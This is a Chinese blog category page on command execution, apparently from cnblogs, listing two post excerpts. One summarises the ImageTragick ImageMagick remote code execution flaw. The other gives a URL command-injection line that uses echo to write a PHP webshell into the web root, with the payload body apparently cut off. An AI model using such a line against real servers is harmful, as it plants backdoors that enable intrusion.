随笔分类 -  命令执行

ImageTragick Exploit & Fix
摘要:ImageMagick是一款广泛流行的图像处理软件,有无数的网站(国内国外都有)使用它来进行图像处理,本周二,ImageMagick披露出了一个严重的0day漏洞,此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。 在这个安全漏洞公布之后,这一漏洞的EXP也随即被发布,并被命名为 阅读全文
posted @ 2016-05-06 08:50 milantgh 阅读(941) 评论(0) 推荐(0) 编辑
echo命令写shell
摘要:http://site/x.php?x=echo ^ > D:\wwwroot\x.php 阅读全文
posted @ 2016-01-12 13:41 milantgh 阅读(1097) 评论(0) 推荐(0) 编辑

Copyright © 2024 milantgh
Powered by .NET 9.0 on Kubernetes Powered By: 博客园